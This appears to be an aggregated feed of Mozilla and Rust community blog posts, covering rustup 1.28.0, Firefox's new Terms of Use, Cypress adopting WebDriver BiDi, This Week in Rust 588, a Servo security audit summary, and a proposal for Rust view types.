  • I've also opened a handful of PRs gradually expanding the polonius MIR dump with visualizations. I'll next add the interactive "tool" I've been using to help debug the test failures.
  • on organization and collaboration:
    • we've met with one of Amanda's students for a possible Master's thesis on the more engineer-y side of polonius (perf <3)
    • and have also discussed, with @ralfjung's team, the related topic of modeling the borrowck in a-mir-formality
No detailed updates available.
1 detailed update available.

Comment by @davidtwco posted on 2025-02-19:

An initial update on what we've been up to and some background:

  • This goal is submitted on behalf of the Rust team at Arm, but primarily worked on by myself (@davidtwco) and @JamieCunliffe. Anyone interested can always contact me for updates and I'll keep this issue up-to-date.
  • @JamieCunliffe has been working on supporting Arm's scalable vector extension (SVE) for a couple of years - primarily in rust-lang/rfcs#3268 and its implementation rust-lang/rust#118917.
    • Through this work, we've discovered other changes to the language necessary to be able to support these types without special cases in the type system, which we're also working on (see below).
    • Jamie is still resolving feedback on this RFC and its implementation, and keeping it rebased. We hope that it can be landed experimentally now that there's a feasible path to remove the special cases in the type system (see below).
    • The next steps for this RFC and implementation are..
      • ..to continue to respond to feedback on the RFC and implementation.
  • I've (@davidtwco) been working on rust-lang/rfcs#3729 which improves Rust's support for exotically sized types, and would allow scalable vectors to be represented in the type system without special cases.
    • We've had two design meetings with the language team about the RFC and had a broadly positive reception.
      • There is a non-strict dependency on const traits (rust-lang/rfcs#3762) which has created uncertainty as to whether this RFC could be accepted without the specifics of const traits being nailed down.
    • I've been working on implementing the RFC: an initial implementation of the non-const traits has been completed and adding the const traits is in-progress.
      • The language team have indicated interest in seeing this land experimentally, but this will depend on whether the implementors of const traits are okay with this, as it would add to the work they need to do to make any syntactic changes requested by the language team in rust-lang/rfcs#3762.
    • I'm continuing to respond to feedback on the RFC, but as this has largely trailed off, the next steps for this RFC are..
      • ..for the language team to decide to accept, reject, or request further changes to the RFC.
      • ..for progress on the implementation to continue.
1 detailed update available.

Comment by @jswrenn posted on 2025-02-26:

Key developments: In a Feb 19 Lang Team Design Meeting, we reached consensus that the MVP for unsafe fields should be limited to additive invariants.

No detailed updates available.

The Rust Programming Language BlogRust participates in Google Summer of Code 2025

We are happy to announce that the Rust Project will again be participating in Google Summer of Code (GSoC) 2025, same as last year. If you're not eligible or interested in participating in GSoC, then most of this post likely isn't relevant to you; if you are, this should contain some useful information and links.

Google Summer of Code (GSoC) is an annual global program organized by Google that aims to bring new contributors to the world of open-source. The program pairs organizations (such as the Rust Project) with contributors (usually students), with the goal of helping the participants make meaningful open-source contributions under the guidance of experienced mentors.

The organizations that have been accepted into the program have been announced by Google. The GSoC applicants now have several weeks to discuss project ideas with mentors. Later, they will send project proposals for the projects that they found the most interesting. If their project proposal is accepted, they will embark on a several month journey during which they will try to complete their proposed project under the guidance of an assigned mentor.

We have prepared a list of project ideas that can serve as inspiration for potential GSoC contributors that would like to send a project proposal to the Rust organization. However, applicants can also come up with their own project ideas. You can discuss project ideas or try to find mentors in the #gsoc Zulip stream. We have also prepared a proposal guide that should help you with preparing your project proposals.

You can start discussing the project ideas with Rust Project mentors and maintainers immediately, but you might want to keep the following important dates in mind:

  • The project proposal application period starts on March 24, 2025. From that date you can submit project proposals into the GSoC dashboard.
  • The project proposal application period ends on April 8, 2025 at 18:00 UTC. Take note of that deadline, as there will be no extensions!

If you are interested in contributing to the Rust Project, we encourage you to check out our project idea list and send us a GSoC project proposal! Of course, you are also free to discuss these projects and/or try to move them forward even if you do not intend to (or cannot) participate in GSoC. We welcome all contributors to Rust, as there is always enough work to do.

Last year was our first time participating in GSoC, and it was a success! This year we are very excited to participate again. We hope that participants in the program can improve their skills, but also would love for this to bring new contributors to the Project and increase the awareness of Rust in general. Like last year, we expect to publish blog posts in the future with updates about our participation in the program.

Don Martitwo open source stories

First, I know that pretty much everyone is (understandably) freaking out about stuff that is getting worse, but I just wanted to share some good news in the form of an old-fashioned open-source success story. I’m a fairly boring person and developed most of my software habits in the late 1990s and early 2000s, so it’s pretty rare that I actually hit a bug.

But so far this blog has hit two: one browser compatibility issue and this one. The script for rebuilding when a file changes depends on the inotifywait utility, and it turned out that, until recently, it would break when you asked it to watch more than 1024 files.

  1. I filed a bug.

  2. A helpful developer, Jan Kratochvil, wrote a fix and put in a pull request.

  3. A bot made test packages and commented with instructions for me on how to test the fix.

  4. I commented that the new version works for me.

  5. The fix just went into Fedora. Pretty damn slick.

This is a great improvement over how this kind of thing used to work. I hardly had to do anything. These kids today don’t know how good they have it.

story number 2: why support the Linux desktop?

Amazon Chime is shutting down. Did anyone use it? I get invited to a lot of video conferences, and I never got invited to an Amazon Chime meeting. Even though Amazon.com is normally really good at SaaS, this one didn’t take off. What happened?

It looks like Amazon Chime was an interesting example of Nassim Nicholas Taleb’s intransigent minority effect.

The system requirements for Amazon Chime look pretty reasonable, right? Should get 95% of the client systems out there. The number of desktop Linux users is pretty small. But if you have 20 meetings a week, at 95% compatibility you’re going to average a compatibility issue every week. Even worse, the people you most want to make a good first impression on are the people whose client platform you’re least likely to know.

And if you do IT support for a company with 100 people organizing meetings, Amazon Chime is going to cause way too many support issues to put up with. Taleb uses the examples of kosher and halal food—only a small fraction of the population will only eat kosher or halal, but when planning food for a large group, the most practical choice is to satisfy the minority.

The minority rule will show us how all it takes is a small number of intolerant virtuous people with skin in the game, in the form of courage, for society to function properly.

Anyway, something to keep in mind in the future for anyone considering moving the "support desktop Linux" or "support Firefox" tickets to the backlog. None of the successful video conferencing platforms give me any grief for my Linux/Firefox/privacy nerdery client-side setup.

Bonus links

Liam Proven and Thomas Claburn cover the latest web browser surveillance drama: Mozilla flamed by Firefox fans after reneging on promises to not sell their data. Mozilla doesn't sell data about you (in the way that most people think about selling data), and we don't buy data about you, he said. We changed our language because some jurisdictions define sell more broadly than most people would usually understand that word. (Don't forget to turn off advertising features in Firefox.)

David Roberts interviews Mustafa Amjad and Waqas Moosa about Pakistan’s solar boom. What has prompted this explosion of distributed solar is some combination of punishingly high prices for grid power and solar panels getting very, very, very cheap. A glut of Chinese overcapacity means that the price of panels in Pakistan has gone from 24 cents a watt to 10 cents a watt in just the past year or two. Distributed solar is breaking over Pakistan like a tidal wave, despite utilities and a grid that do not seem entirely prepared for it.

AI and Esoteric Fascism by Baldur Bjarnason. When I first began to look into Large Language Models (LLMs) and Diffusion Models back in 2022, it quickly became obvious that much of the rhetoric around LLMs was… weird. Or, if we’re being plain-spoken, much of what the executives and engineers at the organisations making these systems were saying was outright weirdo cult shit…

Poll: Small business owners feel more uncertain about the future The NFIB said small business owners are feeling less confident about investing in their business due to uncertain business conditions in the coming months.

It is no longer safe to move our governments and societies to US clouds by Bert Hubert. With all sorts of magic legal spells like DPIAs and DTIAs, organizations attempt to justify transferring our data and processes to the US. There is a whole industry that has been aiding and abetting this process for years. People also fool themselves that special keys and “servers in the EU” will get you “a safe space” within the American cloud. It won’t.

Max Murphy says Goodbye Surveillance Capitalism, Hello Surveillance Fascism Surveillance fascism thrives where corporate greed and state power merge.

This came out in 2020 but worth re-reading today: Puncturing the Paradox: Group Cohesion and the Generational Myth by Harry Guild. The highest group cohesion by profession is in Marketing. This is advertising’s biggest problem in a single chart. This is the monoculture. How can we possibly understand, represent and sell to an entire country when we exist in such a bubble? We like to style ourselves as free thinkers, mavericks and crazies, but the grim truth is that we’re a more insular profession than farming and boast more conformists than the military.

Tech continues to be political by Miriam Eric Suzanne. Maybe we should consider the beliefs and assumptions that have been built into a technology before we embrace it? But we often prefer to treat each new toy as an abstract and unmotivated opportunity. If only the good people like ourselves would get involved early, we can surely teach everyone else to use it ethically!

Important reminder at Sauropod Vertebra Picture of the Week. If you believe in “Artificial Intelligence”, take five minutes to ask it about stuff you know well Because LLMs get catastrophically wrong answers on topics I know well, I do not trust them at all on topics I don’t already know. And if you do trust them, I urge you to spend five minutes asking your favourite one about something you know in detail. (This is a big part of the reason I don’t use LLMs for search or research. A lot of the material isn’t just wrong, but reflects old, wrong, but often repeated assumptions that you need to know a lot about a field to know not to apply.)

Wendy Davis covers Meta Sued Over Discriminatory College Ads. A civil rights group has sued Meta Platforms over ad algorithms that allegedly discriminate by disproportionately serving ads for for-profit colleges to Black users and ads for public colleges to white users. (Situations like this are a big part of the reason why people should stop putting privacy-enhancing advertising technologies in web browsers—they mainly obfuscate discrimination and fraud.)

Cities Can Cost Effectively Start Their Own Utilities Now by Kevin Burke. Most PG&E ratepayers don’t understand how much higher the rates they pay are than what it actually costs PG&E to generate and transmit the electricity to their house. When I looked into this recently I was shocked. The average PG&E electricity charge now starts at 40 cents per kilowatt hour and goes up from there. Silicon Valley Power, Santa Clara’s utility company, is getting power to customers for 17 cents per kilowatt hour. Sacramento’s utility company charges about the same.

Pluralistic: MLMs are the mirror-world version of community organizing (04 Feb 2025) by Cory Doctorow. The rise of the far right can’t be separated from the history of MLMs.

Jeffrey Emanuel covers A bear case for Nvidia: competition from hardware startups, inference-heavy “reasoning” models, DeepSeek’s training and inference efficiency breakthroughs, more. There are certainly many historical cases where a very important new technology changed the world, but the main winners were not the companies that seemed the most promising during the initial stages of the process.

Three years on, Europe looks to Ukraine for the future of defense tech by Mike Butcher. But in order to invest in the right technology, Europe will have to look to Ukraine, because that is where future wars are being fought right now. TechCrunch recently put a call out for Ukrainian dual-use and defense tech startups to update us on what they are working on. Below is what they sent us, in their own words. Related: Ukrainian Drones Flew 500 Miles And, In A Single Strike, Damaged 5% Of Russia’s Oil Refining Capacity by David Axe. (Drones are getting longer ranges and better autonomy, fast. Fossil fuel infrastructure is not getting any better protected or faster to repair. In the near future, you’re only going to be in the oil or gas business if nobody who is good at ML and model airplanes has a strong objection to you being in the oil or gas business.)

The Rust Programming Language BlogAnnouncing Rustup 1.28.0

The rustup team is happy to announce the release of rustup version 1.28.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

What's new in rustup 1.28.0

This new release of rustup has been a long time in the making and comes with substantial changes.

Before digging into the details, it is worth mentioning that Chris Denton has joined the team. Chris has a lot of experience contributing to Windows-related parts of the Rust Project -- expertise we were previously lacking -- so we're happy to have him on board to help address Windows-specific issues.

The following improvements might require changes to how you use rustup:

  • rustup will no longer automatically install the active toolchain if it is not installed.

    • To ensure its installation, run rustup toolchain install with no arguments.
    • The following command installs the active toolchain both before and after this change:
      rustup show active-toolchain || rustup toolchain install
      # Or, on older versions of PowerShell:
      rustup show active-toolchain; if ($LASTEXITCODE -ne 0) { rustup toolchain install }
      
  • Installing a host-incompatible toolchain via rustup toolchain install or rustup default will now be rejected unless you explicitly add the --force-non-host flag.
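For example, installing a toolchain built for a different host now requires the flag explicitly (an illustrative command; substitute whichever target triple you actually need):

rustup toolchain install stable-aarch64-unknown-linux-gnu --force-non-host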

Rustup now officially supports the following host platforms:

  • aarch64-pc-windows-msvc
  • loongarch64-unknown-linux-musl

This release also comes with various quality-of-life improvements, to name a few:

  • rustup show's output format has been cleaned up, making it easier to find out about your toolchains' status.
  • rustup doc now accepts a flag and a topic at the same time, enabling quick navigation to specific parts of more books.
  • rustup's remove subcommands now support more aliases such as rm and del.
  • Basic support for nushell has been added.

We have additionally made the following internal changes:

  • The default download backend has been changed from reqwest with native-tls to reqwest with rustls.
    • RUSTUP_USE_CURL and RUSTUP_USE_RUSTLS can still be used to change the download backend if the new backend causes issues. If issues do happen, please let us know.
    • The default backend now uses rustls-platform-verifier to verify server certificates, taking advantage of the platform's certificate store on platforms that support it.
  • When creating proxy links, rustup will now try symlinks first and fall back to hardlinks, as opposed to trying hardlinks first.
  • A new RUSTUP_LOG environment variable can be used to control tracing-based logging in rustup binaries. See the dev guide for more details.

Finally, there are some notable changes to our official website as well:

  • The overall design of the website has been updated to better align with the Rust Project's branding.
  • It is now possible to download the prebuilt rustup-init.exe installer for the aarch64-pc-windows-msvc host platform via https://win.rustup.rs/aarch64.

Further details are available in the changelog!

How to update

If you have a previous version of rustup installed, getting rustup 1.28.0 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

$ rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

$ rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

Rustup's documentation is also available in the rustup book.

Caveats

Rustup releases can come with problems not caused by rustup itself but just due to having a new release, such as anti-malware scanners flagging the new binaries or hosted CI images still shipping the previous version.

These issues should be automatically resolved in a few weeks when the anti-malware scanners are updated to be aware of the new rustup release, and the hosted version is updated across all CI runners.

Thanks

Thanks again to all the contributors who made rustup 1.28.0 possible!

The Mozilla BlogAn update on our Terms of Use

On Wednesday we shared that we’re introducing a new Terms of Use (TOU) and Privacy Notice for Firefox. Since then, we’ve been listening to some of our community’s concerns with parts of the TOU, specifically about licensing. Our intent was just to be as clear as possible about how we make Firefox work, but in doing so we also created some confusion and concern. With that in mind, we’re updating the language to more clearly reflect the limited scope of how Mozilla interacts with user data.

Here’s what the new language will say:

You give Mozilla the rights necessary to operate Firefox. This includes processing your data as we describe in the Firefox Privacy Notice. It also includes a nonexclusive, royalty-free, worldwide license for the purpose of doing as you request with the content you input in Firefox. This does not give Mozilla any ownership in that content. 

In addition, we’ve removed the reference to the Acceptable Use Policy because it seems to be causing more confusion than clarity.

Privacy FAQ

We also updated our Privacy FAQ to better address legal minutia around terms like “sells.” While we’re not reverting the FAQ, we want to provide more detail about why we made the change in the first place.

TL;DR Mozilla doesn’t sell data about you (in the way that most people think about “selling data”), and we don’t buy data about you. We changed our language because some jurisdictions define “sell” more broadly than most people would usually understand that word. Firefox has built-in privacy and security features, plus options that let you fine-tune your data settings.


The reason we’ve stepped away from making blanket claims that “We never sell your data” is because, in some places, the LEGAL definition of “sale of data” is broad and evolving. As an example, the California Consumer Privacy Act (CCPA) defines “sale” as the “selling, renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by [a] business to another business or a third party” in exchange for “monetary” or “other valuable consideration.”  

Similar privacy laws exist in other US states, including in Virginia and Colorado. And that’s a good thing — Mozilla has long been a supporter of data privacy laws that empower people — but the competing interpretations of do-not-sell requirements do leave many businesses uncertain about their exact obligations and whether or not they’re considered to be “selling data.” 

In order to make Firefox commercially viable, there are a number of places where we collect and share some data with our partners, including our optional ads on New Tab and providing sponsored suggestions in the search bar. We set all of this out in our Privacy Notice. Whenever we share data with our partners, we put a lot of work into making sure that the data that we share is stripped of potentially identifying information, or shared only in the aggregate, or is put through our privacy preserving technologies (like OHTTP). 


We’re continuing to make sure that Firefox provides you with sensible default settings that you can review during onboarding or adjust at any time.

The post An update on our Terms of Use appeared first on The Mozilla Blog.

The Mozilla BlogIntroducing a terms of use and updated privacy notice for Firefox

UPDATE: We’ve seen a little confusion about the language regarding licenses, so we want to clear that up. We need a license to allow us to make some of the basic functionality of Firefox possible. Without it, we couldn’t use information typed into Firefox, for example. It does NOT give us ownership of your data or a right to use it for anything other than what is described in the Privacy Notice.

We’re introducing a Terms of Use for Firefox for the first time, along with an updated Privacy Notice

Why now? Although we’ve historically relied on our open source license for Firefox and public commitments to you, we are building in a much different technology landscape today. We want to make these commitments abundantly clear and accessible. 

While for most companies these are pretty standard legal documents, at Mozilla we look at things differently. We lay out our principles in our Manifesto:

  • Your security and privacy on the internet are fundamental and must not be treated as optional. 
  • You deserve the ability to shape the internet and your own experiences on it — including how your data is used. 
  • We believe that practicing transparency creates accountability and trust.

Firefox will always continue to add new features, improve existing ones, and test new ideas. We remain dedicated to making Firefox open source, but we believe that doing so along with an official Terms of Use will give you more transparency over your rights and permissions as you use Firefox. And actually asking you to acknowledge it is an important step, so we’re making it a part of the standard product experience starting in early March for new users and later this year for existing ones.

In addition to the Terms of Use, we are providing a more detailed explanation of our data practices in our updated Privacy Notice. We tried to make these easy to read and understand — there shouldn’t be any surprises in how we operate or how our product works.

We have always prioritized user privacy and will continue to do so. We use data to make Firefox functional and sustainable, improve your experience, and keep you safe. Some optional Firefox features or services may require us to collect additional data to make them work, and when they do, your privacy remains our priority. We intend to be clear about what data we collect and how we use it. 

Finally, you are in control. We’ve set responsible defaults that you can review during onboarding or adjust in your settings at any time: These simple, yet powerful tools let you manage your data the way you want.

You deserve that choice, and we hope all technology companies will start to provide it. It’s standard operating procedure for us.

The post Introducing a terms of use and updated privacy notice for Firefox appeared first on The Mozilla Blog.

Firefox Developer ExperienceWebDriver BiDi Becomes the Default for Cypress with Firefox

At Mozilla, we know that creating compelling web experiences depends on the ability to test sites across all browsers. This means that enabling excellent cross-browser automation is a key part of how we deliver our vision for the open web.

Today, we are excited to share a significant milestone: Cypress will use WebDriver BiDi as its default automation protocol for Firefox 135 and later, starting with Cypress 14.1.0.

Why WebDriver BiDi?

WebDriver BiDi is a cross-browser automation protocol undergoing standardisation at W3C. It is designed as an update to the existing WebDriver standard that provides the two-way communication and rich feature set required for modern testing tools.

Prior to WebDriver BiDi, browser testing tools such as Cypress often used the Chrome DevTools Protocol (CDP) to gain access to functionality not available in WebDriver. However, this comes with a significant disadvantage: as the name suggests, the Chrome DevTools Protocol is only available in Chromium-based browsers, significantly limiting its suitability for cross-browser testing. For more information on the relationship between CDP and WebDriver BiDi, see our posts on the hacks blog.

To help bridge this gap, back in 2019 Firefox started to implement a subset of CDP directly in Gecko. This has been used by Cypress as part of their Firefox backend since version 4.0. However with WebDriver BiDi now offering a richer feature set and undergoing continual improvements, we believe that switching to the standard protocol will better serve the needs of Cypress users.

If you use Cypress and run into difficulties, it is temporarily possible to switch back to the CDP backend by setting the environment variable FORCE_FIREFOX_CDP=1. If you need to do this please file a bug. Cypress are planning to deprecate support for this in version 15 and the CDP support in Firefox will be removed after the next ESR release.
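For example, on a Unix-like shell that could look like the following (an illustrative command; adjust it to however you normally invoke Cypress):

FORCE_FIREFOX_CDP=1 npx cypress run --browser firefox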

You can also check out the Cypress team’s blog post about the change.

Close Collaboration for a Seamless Transition

This achievement would not have been possible without the close collaboration between Mozilla and Cypress. From initial planning to implementation and testing, we worked together to ensure WebDriver BiDi meets the needs of Cypress users. This underscores our commitment to providing developers with powerful and reliable tools for cross-browser testing.

CDP Support Ends with Firefox 141

As we continue transitioning to WebDriver BiDi, support for the experimental Chrome DevTools Protocol in Firefox will officially end with Firefox 141, set for release on July 22nd. The 140 ESR release will continue to have CDP support for its full support lifecycle. Removing the CDP implementation will allow us to focus our efforts entirely on improving WebDriver BiDi.

What’s Next?

We believe that WebDriver BiDi provides a solid foundation for the future of browser testing and automation. We will continue to work closely with automation tools to ensure that it meets their needs for a robust, feature-rich, cross-browser automation protocol.

Stay tuned for further updates as we continue improving the Firefox automation experience. The future of automation is here, and WebDriver BiDi is leading the way!

This Week In RustThis Week in Rust 588

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is hiqlite, a database project combining SQLite with OpenRaft to enable high-availability applications with embedded database.

Thanks to Audun Halland for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

506 pull requests were merged in the last week

Compiler
Library
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Fairly quiet week, with the exception of an improvement to the very often used Iter::next function, which can now be inlined, leading to a myriad of performance improvements.

Triage done by @rylev. Revision range: ce36a966..f5729cfe

Summary:

(instructions:u)            mean    range            count
Regressions ❌ (primary)     0.4%    [0.2%, 1.0%]     37
Regressions ❌ (secondary)   0.7%    [0.2%, 8.6%]     54
Improvements ✅ (primary)    -0.5%   [-1.4%, -0.1%]   88
Improvements ✅ (secondary)  -0.6%   [-2.3%, -0.1%]   87
All ❌✅ (primary)           -0.2%   [-1.4%, 1.0%]    125

1 Regression, 1 Improvement, 7 Mixed; 2 of them in rollups. 40 artifact comparisons were made in total.

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Tracking Issues & PRs
Rust
Other Areas

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-26 - 2025-03-26 🦀

Virtual
Asia
Europe
North America
Oceania
South America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Rust isn't a "silver bullet" that will solve all of our problems, but it sure will help in a huge number of places, so for new stuff going forward, why wouldn't we want that?

Greg Kroah-Hartman on the Linux Kernel Mailing List

Thanks to Krishna Sundarram for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

The Servo BlogServo Security Report: findings and solutions

The Servo project has received several grants from NLnet Foundation, and as part of these grants, NLnet offers different support services. These services include security audits from Radically Open Security.

In one of our projects with NLnet, we were working on adding support for CSS floats and tables in Servo. Once the project was completed, we reached out to Radically Open Security to run a security audit. The focus of the audit was on the code related to that project, so the main components investigated were the CSS code paths in the layout engine and Stylo. As part of this audit, four vulnerabilities were identified:

  • CLN-009 (Third-Party Library Vulnerability, threat level: Moderate): Servo uses an outdated version of the time crate that is vulnerable to a known issue.
  • CLN-004 (Arithmetic underflow, threat level: Low): By calling methods on a TableBuilder object in a specific order, an integer underflow can be triggered, followed by an attempted out-of-bounds access, which is caught by Rust, resulting in a panic.
  • CLN-002 (Arithmetic underflow, threat level: N/A): An arithmetic underflow condition is currently impossible to trigger, but may become accessible as its surrounding logic evolves.
  • CLN-007 (Unguarded casting, threat level: N/A): Casting from an unsigned platform pointer-width integer into a fixed-width signed integer may result in erroneous layouts.

If you want to know more details you can read the full report.

The first issue (CLN-009) was related to a known vulnerability in version 0.1 of the time crate that Servo depended on (RUSTSEC-2020-0071). We had removed this in most of Servo, but there was one remaining dependency in WebRender. We have since addressed this vulnerability by removing it from the version of WebRender used in Servo (@mrobinson, #35325), and we will also try to upstream our changes so that Firefox is unaffected.

We have also fixed the second (CLN-004) and third (CLN-002) issues by making the affected code more robust (@Loirooriol, #34247, #35437), in the event web content can trigger them.

The fourth issue (CLN-007) is not urgent, since the values are constrained elsewhere and it would otherwise only affect layout correctness and not security, but it’s worth fixing at some point too.

Servo has long been highlighted for being a memory-safe and concurrency-safe web rendering engine, thanks to the guarantees provided by the Rust programming language, including its ownership system, borrow checker, and built-in data structures that enable safe concurrent programming. These features help prevent memory and concurrency vulnerabilities, such as use-after-free bugs and data races.
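As a small illustration (mine, not taken from the audit report) of the kind of bug these guarantees rule out, a use-after-free attempt like the following sketch is rejected by the borrow checker at compile time:

fn main() {
    let reference;
    {
        let value = String::from("experiment");
        reference = &value; // ERROR: `value` does not live long enough
    }
    // `value` has already been dropped here, so reading through `reference`
    // would be a use-after-free; the compiler refuses to build this program.
    println!("{reference}");
}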

We find it promising that this security audit, although smaller and of limited scope, identified no severe vulnerabilities, especially none of that nature, and that we were able to address any vulnerabilities identified. This was a positive experience for Servo and the web, and we’re keen to explore more security auditing for Servo in the future.

Thanks to the folks at Radically Open Security for their work on this audit, and NLnet Foundation for continuously supporting the Servo project.

Niko MatsakisView types redux and abstract fields

A few years back I proposed view types as an extension to Rust’s type system to let us address the problem of (false) inter-procedural borrow conflicts. The basic idea is to introduce a “view type” {f1, f2} Type[1], meaning “an instance of Type where you can only access the fields f1 or f2”. The main purpose is to let you write function signatures like & {f1, f2} self or &mut {f1, f2} self that define what fields a given type might access. I was thinking about this idea again and I wanted to try and explore it a bit more deeply, to see how it could actually work, and to address the common question of how to have places in types without exposing the names of private fields.

Example: the Data type

The Data type is going to be our running example. The Data type collects experiments, each of which has a name and a set of f32 values. In addition to the experimental data, it has a counter, successful, which indicates how many measurements were successful.

struct Data {
    experiments: HashMap<String, Vec<f32>>,
    successful: u32,
}

There are some helper functions you can use to iterate over the list of experiments and read their data. All of these return data borrowed from self. Today in Rust I would typically leverage lifetime elision, where the & in the return type is automatically linked to the &self argument:

impl Data {
    pub fn experiment_names(
        &self,
    ) -> impl Iterator<Item = &String> {
       self.experiments.keys()
    }

    pub fn for_experiment(
        &self, 
        experiment: &str,
    ) -> &[f32] {
        self.experiments.get(experiment).map(Vec::as_slice).unwrap_or(&[])
    }
}

Tracking successful experiments

Now imagine that Data has methods for reading and modifying the counter of successful experiments:

impl Data {
    pub fn successful(&self) -> u32 {
        self.successful
    }

    pub fn add_successful(&mut self) {
        self.successful += 1;
    }
}

Today, “aggregate” types like Data present a composition hazard

The Data type as presented thus far is pretty sensible, but it can actually be a pain to use. Suppose you wanted to iterate over the experiments, analyze their data, and adjust the successful counter as a result. You might try writing the following:

fn count_successful_experiments(data: &mut Data) {
    for n in data.experiment_names() {
        if is_successful(data.for_experiment(n)) {
            data.add_successful(); // ERROR: data is borrowed here
        }
    }
}

Experienced Rustaceans are likely shaking their heads at this point—in fact, the previous code will not compile. What’s wrong? Well, the problem is that experiment_names returns data borrowed from self which then persists for the duration of the loop. Invoking add_successful then requires an &mut Data argument, which causes a conflict.

The compiler is indeed flagging a reasonable concern here. The risk is that add_successful could mutate the experiments map while experiment_names is still iterating over it. Now, we as code authors know that this is unlikely — but let’s be honest, it may be unlikely now, but it’s not impossible that as Data evolves somebody might add some kind of logic into add_successful that would mutate the experiments map. This is precisely the kind of subtle interdependency that can make an innocuous “but it’s just one line!” PR cause a massive security breach. That’s all well and good, but it’s also very annoying that I can’t write this code.

Using view types to flag what is happening

The right fix here is to have a way to express what fields may be accessed in the type system. If we do this, then we can get the code to compile today and prevent future PRs from introducing bugs. This is hard to do with Rust’s current system, though, as types do not have any way of talking about fields, only spans of execution-time (“lifetimes”).

With view types, though, we can change the signature from &self to &{experiments} self. Just as &self is shorthand for self: &Data, this is actually shorthand for self: & {experiments} Data.

impl Data {
    pub fn experiment_names(
       & {experiments} self,
    ) -> impl Iterator<Item = &String> {
       self.experiments.keys()
    }


    pub fn for_experiment(
        & {experiments} self,
        experiment: &str,
    ) -> &[f32] {
        self.experiments.get(experiment).map(Vec::as_slice).unwrap_or(&[])
    }
}

We would also modify the add_successful method to flag what field it needs:

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       self.successful += 1;
    }
}

Getting a bit more formal

The idea of this post was to sketch out how view types could work in a slightly more detailed way. The basic idea is to extend Rust’s type grammar with a new type…

T = &'a mut? T
  | [T]
  | Struct<...>
  | …
  | {field-list} T // <— view types

We would also have some kind of expression for defining a view onto a place. This would be a place expression. For now I will write E = {f1, f2} E to define this expression, but that’s obviously ambiguous with Rust blocks. So for example you could write…

let mut x: (String, String) = (String::new(), String::new());
let p: &{0} (String, String) = & {0} x;
let q: &mut {1} (String, String) = &mut {1} x;

…to get a reference p that can only access the field 0 of the tuple and a reference q that can only access field 1. Note the difference between &{0}x, which creates a reference to the entire tuple but with limited access, and &x.0, which creates a reference to the field itself. Both have their place.
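For contrast, here is a minimal sketch in today's Rust (no view types involved) that borrows the fields themselves rather than views of the whole tuple; the borrow checker already treats x.0 and x.1 as disjoint, which is the per-field reasoning that view types would extend to references to the whole place:

fn main() {
    let mut x: (String, String) = (String::new(), String::new());

    // Plain field borrows: each reference points at a single field, not the tuple.
    let p: &String = &x.0; // shared borrow of field 0 only
    let q: &mut String = &mut x.1; // mutable borrow of field 1 only

    q.push_str("hello");
    println!("{p} {q}"); // both borrows coexist because the fields are disjoint
}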

Checking field accesses against view types

Consider this function from our example:

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       self.successful += 1;
    }
}

How would we type check the self.successful += 1 statement? Today, without view types, typing an expression like self.successful begins by getting the type of self, which is something like &mut Data. We then “auto-deref”, looking for the struct type within. That would bring us to Data, at which point we would check to see if Data defines a field successful.

To integrate view types, we have to track both the type of data being accessed and the set of allowed fields. Initially we have variable self with type &mut {successful} Data and allow set *. The deref would bring us to {successful} Data (allow-set remains *). Traversing a view type modifies the allow-set, so we go from * to {successful} (to be legal, every field in the view must be allowed). We now have the type Data. We would then identify the field successful as both a member of Data and a member of the allow-set, and so this code would be successful.

If however you tried to modify a function to access a field not declared as part of its view, e.g.,

impl Data {
    pub fn add_successful(
        self: &mut {successful} Self,
    ) {
       assert!(!self.experiments.is_empty()); // <— modified to include this
       self.successful += 1;
    }
}

the self.experiments type-checking would now fail, because the field experiments would not be a member of the allow-set.

We need to infer allow sets

A more interesting problem comes when we type-check a call to add_successful(). We had the following code:

fn count_successful_experiments(data: &mut Data) {
    for n in data.experiment_names() {
        if is_successful(data.for_experiment(n)) {
            data.add_successful(); // Was error, now ok.
        }
    }
}

